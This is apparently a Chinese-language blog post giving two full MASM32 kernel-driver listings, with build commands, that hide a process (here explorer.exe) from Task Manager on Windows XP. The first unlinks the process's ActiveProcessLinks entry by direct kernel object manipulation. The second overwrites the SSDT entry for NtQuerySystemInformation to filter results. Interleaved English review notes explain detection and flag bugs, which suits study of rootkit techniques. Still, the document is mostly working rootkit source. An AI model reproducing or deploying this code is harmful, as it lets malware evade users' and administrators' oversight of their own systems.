作者:dge

进程隐藏的两种方法
这两种都是很古老的方法,因为无聊,所以写了一下。代码在XP_SP2下调试通过.

(1).从活动进程链表(ActiveProcessLinks)中摘除自身,这种方法可以欺骗任务管理器,
下面这个程序做的就是双向链表的删除节点和插入节点,十分的简单。

;f:\masm32\bin\ml /nologo /c /coff HideProcess_ActiveProcessLinks.asm
;f:\masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:HideProcess_ActiveProcessLinks.sys /subsystem:native HideProcess_ActiveProcessLinks.obj
;
; Review notes (defender's reading of this listing):
; - This is a DKOM (direct kernel object manipulation) demo: it unlinks one
;   EPROCESS from the kernel's ActiveProcessLinks ring so that enumerators
;   that walk the ring (Task Manager, via NtQuerySystemInformation) do not
;   report it.  The process keeps running: its threads are still scheduled
;   and its PID is still in the kernel's PID/handle table, which is what
;   cross-view detection (compare a ring walk against the PID table or
;   thread lists, or pool-scan memory for EPROCESS objects) relies on.
; - The EPROCESS field offsets below are hard-coded for two specific OS
;   releases (the author states it was debugged on XP SP2); on any other
;   build the walk dereferences the wrong fields.  Unsigned third-party
;   drivers of this kind cannot be loaded on 64-bit Windows with driver
;   signature enforcement, and kernel structure integrity protection there
;   is a further obstacle -- treat this as historical 32-bit material.
; - Target: MASM32 with the w2k (KmdKit-style) includes, 32-bit, stdcall.
.386
.model flat, stdcall
option casemap:none
;----------------------------------------------------------------------------------------------------
; I N C L U D E   F I L E S
;----------------------------------------------------------------------------------------------------
include f:\masm32\include\w2k\ntstatus.inc
include f:\masm32\include\w2k\ntddk.inc
include f:\masm32\include\w2k\ntoskrnl.inc
include f:\masm32\include\w2k\w2kundoc.inc
includelib f:\masm32\lib\w2k\ntoskrnl.lib
include f:\masm32\Macros\Strings.mac

_DriverUnload proto :PDRIVER_OBJECT
_DispatchControlIo proto :PDEVICE_OBJECT,:PIRP     ; declared, but never defined or referenced in this listing
;----------------------------------------------------------------------------------------------------
; C O N S T A N T S
;----------------------------------------------------------------------------------------------------
.const
CCOUNTED_UNICODE_STRING "\\Device\\devHideprocess", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "\\??\\slHideprocess", g_usSymbolicLinkName, 4

;----------------------------------------------------------------------------------------------------
; D A T A
;----------------------------------------------------------------------------------------------------
.data
szHide db 'explorer.exe',0          ; ANSI image name compared against EPROCESS.ImageFileName
Flink dd ?                          ; saved neighbours of the unlinked entry; _DriverUnload relinks through them
Blink dd ?
Explorer dd ?                       ; address of the unlinked LIST_ENTRY (inside the hidden EPROCESS)
;----------------------------------------------------------------------------------------------------
; C O D E
;----------------------------------------------------------------------------------------------------
.code
;-----------------------------------------------------------------------
; NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pusRegistryPath)
; Creates the device object, installs _DriverUnload, then walks the
; ActiveProcessLinks ring starting at the calling process and unlinks the
; first entry whose ImageFileName equals szHide.
; Registers: esi = cursor (LIST_ENTRY*, or char* name while comparing),
;            edi = ring entry of the calling process (loop terminator),
;            eax/ebx = Flink/Blink neighbours during the unlink.
; Returns STATUS_SUCCESS, or STATUS_DEVICE_CONFIGURATION_ERROR when device
; creation fails or the OS minor version is neither 0 nor 1.
;-----------------------------------------------------------------------
DriverEntry proc uses ebx edi esi, pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
    local status:NTSTATUS
    local pDeviceObject:PDEVICE_OBJECT
    local dwId,lpEprocess
    local ListOffset,NameOffset
    local IdOffset                  ; never written or read in this procedure
    local Version
    ; int 3
    ; invoke DbgPrint,$CTA0("\n\nEntry DriverEntry\n\n")
    mov status,STATUS_DEVICE_CONFIGURATION_ERROR
    invoke IoCreateDevice,pDriverObject,0,addr g_usDeviceName,FILE_DEVICE_UNKNOWN,0,FALSE,addr pDeviceObject
    .if eax==STATUS_SUCCESS
        mov eax,pDriverObject
        assume eax:ptr DRIVER_OBJECT
        mov [eax].DriverUnload, offset _DriverUnload
        assume eax:nothing
        ; Get the OS version; only the second out-parameter (minor version) is kept.
        invoke PsGetVersion,NULL,addr Version,NULL,NULL
        mov eax,Version
        cmp eax,0
        jne l1
        ; minor version 0 (Windows 2000): ActiveProcessLinks at 0A0h, ImageFileName at 1FCh
        mov ListOffset,0A0h
        mov NameOffset,1fch
        jmp l2
l1:
        cmp eax,1
        jne exit                    ; any other release: leave with status still = configuration error
        ; minor version 1 (Windows XP): ActiveProcessLinks at 88h, ImageFileName at 174h
        mov ListOffset,88h
        mov NameOffset,174h
l2:
        invoke PsGetCurrentProcessId
        mov dwId,eax
        ; NOTE(review): the returned status is not checked, and the EPROCESS
        ; reference this lookup takes is never released (no ObDereferenceObject).
        invoke PsLookupProcessByProcessId,dwId,addr lpEprocess
        mov esi,lpEprocess
        add esi,ListOffset          ; esi = &EPROCESS.ActiveProcessLinks of the calling process
        mov edi,esi                 ; edi = where the ring walk started
        assume edi:PLIST_ENTRY
        assume esi:PLIST_ENTRY
l3:
        mov edx,[esi].Flink
        ; Stop when the next entry is the starting one (full circle).
        ; NOTE(review): the entry whose Flink is the start is itself never compared.
        cmp edx,edi
        je l4
        assume esi:nothing
        sub esi,ListOffset
        add esi,NameOffset          ; esi = &EPROCESS.ImageFileName (ANSI char array)
        invoke strcmp,esi,addr szHide
        .if eax == 0
            sub esi,NameOffset
            add esi,ListOffset      ; back to &ActiveProcessLinks of the matched process
            mov Explorer,esi
            assume esi:PLIST_ENTRY
            assume ebx:PLIST_ENTRY
            assume eax:PLIST_ENTRY
            ; Unlink the node: prev->Flink = next, next->Blink = prev.
            ; The node's own Flink/Blink are never rewritten, and the saved
            ; Flink/Blink/Explorer are raw addresses: if the hidden process
            ; or either neighbour exits before _DriverUnload runs, the relink
            ; there writes through stale pointers (list corruption / bugcheck).
            mov eax,[esi].Flink
            mov ebx,[esi].Blink
            mov [ebx].Flink,eax
            mov [eax].Blink,ebx
            mov Flink,eax
            mov Blink,ebx
            assume eax:nothing
            assume ebx:nothing

            invoke DbgPrint,$CTA0("\n\n************hide process successful ***********\n\n")
            jmp l4
        .endif
        ; Restore esi from the name pointer to the LIST_ENTRY and advance.
        sub esi,NameOffset
        add esi,ListOffset
        assume esi:PLIST_ENTRY
        mov esi,[esi].Flink
        jmp l3
l4:
        assume esi:nothing
        assume edi:nothing
        mov status,STATUS_SUCCESS
exit:
    .endif
    mov eax,status
    ret
    mov eax,STATUS_DEVICE_CONFIGURATION_ERROR   ; unreachable: the ret above always executes first
    ret
DriverEntry endp
;----------------------------------------------------------------------------------------------------
; D R I V E R   U N L O A D
;----------------------------------------------------------------------------------------------------
;-----------------------------------------------------------------------
; VOID _DriverUnload(PDRIVER_OBJECT pDriverObject)
; Relinks the node saved in Explorer between the saved Flink/Blink
; neighbours, then deletes the symbolic link and the device object.
; NOTE(review): there is no "was anything unlinked" check -- if DriverEntry
; found no match, Explorer/Flink/Blink still hold their initial (zero)
; values and the stores below dereference them.
;-----------------------------------------------------------------------
_DriverUnload proc pDriverObject:PDRIVER_OBJECT
    ; int 3
    ; invoke DbgPrint,$CTA0("\n\nEntry DriverUnload\n\n")
    pushad

    mov eax,Flink
    mov ebx,Explorer
    assume ebx:PLIST_ENTRY
    assume eax:PLIST_ENTRY
    ; Put the unlinked node back:
    ;   next->Blink = node, node->Flink = next, prev->Flink = node, node->Blink = prev
    mov [eax].Blink,ebx
    mov [ebx].Flink,eax
    mov eax,Blink
    mov [eax].Flink,ebx
    mov [ebx].Blink,eax
    popad
    ; Remove the symbolic link.  No IoCreateSymbolicLink appears anywhere in
    ; this listing, so this deletes a link the driver never created.
    invoke IoDeleteSymbolicLink,addr g_usSymbolicLinkName
    mov eax, pDriverObject
    ; Delete the device object created in DriverEntry.
    invoke IoDeleteDevice,(DRIVER_OBJECT PTR [eax]).DeviceObject
    ret
_DriverUnload endp
;----------------------------------------------------------------------------------------------------
; E N D
;----------------------------------------------------------------------------------------------------
end DriverEntry

2.如果你反汇编taskmgr.exe,可以发现taskmgr.exe是通过NtQuerySystemInformation枚举进程的,
因此可以通过挂钩系统服务NtQuerySystemInformation修改这个函数的行为,从而实现在任务管理器中隐藏进程的目的,下面就是实现代码。
;f:\masm32\bin\ml /nologo /c /coff hook_NtQuerySystemInformation.asm
;f:\masm32\bin\link /nologo /driver /base:0x10000 /align:32 /out:hook_NtQuerySystemInformation.sys /subsystem:native hook_NtQuerySystemInformation.obj
;
; Review notes (defender's reading of this listing):
; - This is a classic 32-bit SSDT hook: the KeServiceDescriptorTable entry
;   for NtQuerySystemInformation is overwritten with the address of
;   NewNtQuerySystemInformation, which forwards to the original and then
;   splices every SYSTEM_PROCESS_INFORMATION record named "explorer.exe"
;   out of the NextEntryOffset chain before the caller sees the buffer.
; - Detection: every SSDT entry should point inside the ntoskrnl image; an
;   entry pointing into a third-party driver is the textbook indicator, and
;   the hidden process is still visible through other views (PID table,
;   thread lists, memory forensics).  On 64-bit Windows, kernel patch
;   protection treats SSDT modification as a fatal integrity violation and
;   unsigned drivers are not loadable, so this is historical material.
; - The patch is done under cli/sti only, which neither excludes other CPUs
;   nor handles a write-protected service-table page (whether the page is
;   writable depends on how the kernel image is mapped on the tested box);
;   the listing relies on the XP SP2 setup the author debugged on.
.386
.model flat, stdcall
option casemap:none
;----------------------------------------------------------------------------------------------------
; I N C L U D E   F I L E S
;----------------------------------------------------------------------------------------------------
include f:\masm32\include\w2k\ntstatus.inc
include f:\masm32\include\w2k\ntddk.inc
include f:\masm32\include\w2k\native.inc
include f:\masm32\include\w2k\ntoskrnl.inc
includelib f:\masm32\lib\w2k\ntoskrnl.lib
include f:\masm32\Macros\Strings.mac
;----------------------------------------------------------------------------------------------------
; D A T A
;----------------------------------------------------------------------------------------------------
.data
; Saved addresses
dwOldNtQuerySystemInformation dd ?          ; original SSDT entry, restored by DriverUnload
dwAddr dd ?                                 ; address of the SSDT slot that was patched
;----------------------------------------------------------------------------------------------------
; C O N S T A N T S
;----------------------------------------------------------------------------------------------------
.const
CCOUNTED_UNICODE_STRING "\\Device\\devHideprocess", g_usDeviceName, 4
CCOUNTED_UNICODE_STRING "\\??\\slHideprocess", g_usSymbolicLinkName, 4
CCOUNTED_UNICODE_STRING "explorer.exe", processname, 4      ; image name filtered out of the results (case-insensitive compare)
;----------------------------------------------------------------------------------------------------
; C O D E
;----------------------------------------------------------------------------------------------------
.code
;-----------------------------------------------------------------------
; NTSTATUS NewNtQuerySystemInformation(SysInfoClass, lpSysInfo, SysInfoL, Return)
; Replacement SSDT entry.  Forwards to the exported NtQuerySystemInformation
; (a direct call, not through the patched table, so no recursion) and, on
; success with SysInfoClass == SystemProcessesAndThreadsInformation,
; removes every record whose ImageName equals processname from the
; NextEntryOffset chain.
; Registers inside pushad/popad: ebx = previous (kept) record,
;   esi = current record, or current record + 38h while comparing names.
; Returns whatever the original returned (eax survives pushad/popad).
; Layout assumed by the code: NextEntryOffset at +0, ImageName
; (UNICODE_STRING) at +38h -- the 32-bit SYSTEM_PROCESS_INFORMATION layout.
; NOTE(review): lpSysInfo is the caller's buffer and is read and written
; here directly, after the original has returned, with no probing and no
; length check against SysInfoL or *Return; the walk trusts NextEntryOffset.
; NOTE(review): the first record is stepped over before the loop, so it is
; never compared.
;-----------------------------------------------------------------------
NewNtQuerySystemInformation proc SysInfoClass,lpSysInfo,SysInfoL,Return
    invoke NtQuerySystemInformation,SysInfoClass,lpSysInfo,SysInfoL,Return
    pushad
    test eax,eax
    jnz exit                        ; original failed (e.g. buffer too small): pass its status through untouched
    .if SysInfoClass == SystemProcessesAndThreadsInformation
        mov esi,lpSysInfo
        mov ebx,esi                 ; ebx = first record, kept as "previous"
        add esi,[esi]               ; esi = second record

@@:
        add esi,38h                 ; esi = &record.ImageName (UNICODE_STRING at offset 38h)
        invoke RtlCompareUnicodeString,addr processname, esi, 1
        .if eax== 0
            invoke DbgPrint, $CTA0("\nsuccessful \n")
            .if dword ptr[esi-38h] == 0
                ; Matched record is the last one: terminate the chain at the previous record.
                mov dword ptr[ebx],0
                jmp exit
            .else
                ; Matched record in the middle: make the previous record jump over it
                ; (prev.NextEntryOffset += this.NextEntryOffset) and keep scanning with
                ; ebx unchanged, so consecutive matches are all skipped.
                sub esi,38h
                mov edx,[esi]
                add [ebx],edx
                add esi,[esi]
                jmp @B
            .endif
        .else
            ; No match: this record becomes "previous"; stop at the last record.
            sub esi,38h
            cmp dword ptr[esi],0
            jz exit
            mov ebx,esi
            add esi,[esi]
            jmp @B
        .endif
    .endif
exit:
    popad

    ret


NewNtQuerySystemInformation endp
;----------------------------------------------------------------------------------------------------
; H O O K   F U N C
;----------------------------------------------------------------------------------------------------
;-----------------------------------------------------------------------
; NTSTATUS HookFunction(void)
; Locates the SSDT slot of NtQuerySystemInformation and overwrites it with
; NewNtQuerySystemInformation.  The service index is read out of the
; ntoskrnl ZwQuerySystemInformation stub (whose first instruction is
; "mov eax, index"); slot = table base + index*4.
; Registers: esi = service table base, then the slot address;
;            eax = pointer-chasing scratch; ecx = index*4; edi = old/new entry.
; Always returns STATUS_SUCCESS.
;-----------------------------------------------------------------------
HookFunction proc

    pushad
    ; int 3
    ; invoke DbgPrint, $CTA0("\nEntry into hoookfunction\n")
    ; Reach the array holding the NtXxxx entry points through the exported
    ; KeServiceDescriptorTable symbol.  How many dereferences this needs
    ; depends on how the include file declares the import (IAT slot ->
    ; descriptor -> ServiceTableBase) -- verify against the include in use.
    mov eax, [KeServiceDescriptorTable]
    mov esi, [eax]
    mov esi, [esi]
    ; The next five instructions appear to walk from the import thunk of
    ; ZwQuerySystemInformation to its body in ntoskrnl: thunk+2 holds the
    ; IAT slot address, and the slot holds the function address.
    mov eax,ZwQuerySystemInformation
    inc eax
    inc eax
    mov eax,[eax]
    mov eax,[eax]
    inc eax                         ; skip the opcode byte of "mov eax, imm32"
    movzx ecx,byte ptr[eax]         ; only the low byte of the service index is used (assumes index < 256)
    sal ecx,2                       ; index * sizeof(PVOID)
    add esi,ecx
    mov dwAddr,esi                  ; remember the slot so DriverUnload can restore it
    mov edi,dword ptr[esi]
    ; Save the old entry point.
    mov dwOldNtQuerySystemInformation,edi
    mov edi,offset NewNtQuerySystemInformation
    ; Patch the entry.  cli/sti only masks interrupts on this CPU; it is not a
    ; cross-processor lock, and the store is a plain mov, not interlocked.
    cli
    mov dword ptr[esi],edi
    sti
    popad
    mov eax, STATUS_SUCCESS
    ret
HookFunction endp
;----------------------------------------------------------------------------------------------------
; DriverUnload
;----------------------------------------------------------------------------------------------------
;-----------------------------------------------------------------------
; VOID DriverUnload(PDRIVER_OBJECT pDriverObject)
; Restores the original SSDT entry, then removes the symbolic link and the
; device object.
; NOTE(review): nothing waits for in-flight calls to
; NewNtQuerySystemInformation to drain; a thread still inside the hook when
; the driver image is unmapped will fault in freed code.
; NOTE(review): IoDeleteSymbolicLink is called although no
; IoCreateSymbolicLink appears anywhere in this driver.
;-----------------------------------------------------------------------
DriverUnload proc pDriverObject:PDRIVER_OBJECT
    ; The register state must be saved here, otherwise the consequences are
    ; severe.  This function restores the patched address.
    pushad
    ; int 3
    ; invoke DbgPrint, $CTA0("\nEntry into DriverUnload \n")
    mov esi,dwAddr
    mov eax,dwOldNtQuerySystemInformation
    cli
    mov dword ptr[esi],eax
    sti
    invoke IoDeleteSymbolicLink, addr g_usSymbolicLinkName
    mov eax,pDriverObject
    invoke IoDeleteDevice, (DRIVER_OBJECT PTR [eax]).DeviceObject
    popad

    ret
DriverUnload endp
;----------------------------------------------------------------------------------------------------
; D R I V E R   E N T R Y
;----------------------------------------------------------------------------------------------------
;-----------------------------------------------------------------------
; NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pusRegistryPath)
; Creates the device object, installs DriverUnload and calls HookFunction.
; Returns STATUS_SUCCESS once the device exists (HookFunction's result is
; not consulted), else STATUS_DEVICE_CONFIGURATION_ERROR.
;-----------------------------------------------------------------------
DriverEntry proc pDriverObject:PDRIVER_OBJECT, pusRegistryPath:PUNICODE_STRING
    local status:NTSTATUS
    local pDeviceObject:PDEVICE_OBJECT
    ; int 3
    ; invoke DbgPrint, $CTA0("\nEntry into DriverEntry\n")
    mov status, STATUS_DEVICE_CONFIGURATION_ERROR
    invoke IoCreateDevice, pDriverObject, 0, addr g_usDeviceName, FILE_DEVICE_UNKNOWN, 0, FALSE, addr pDeviceObject
    .if eax == STATUS_SUCCESS
        mov eax, pDriverObject
        assume eax:ptr DRIVER_OBJECT
        mov [eax].DriverUnload, offset DriverUnload
        assume eax:nothing
        invoke HookFunction
        mov status, STATUS_SUCCESS
    .endif
    mov eax, status
    ret
DriverEntry endp

end DriverEntry
;----------------------------------------------------------------------------------------------------
; E N D
;----------------------------------------------------------------------------------------------------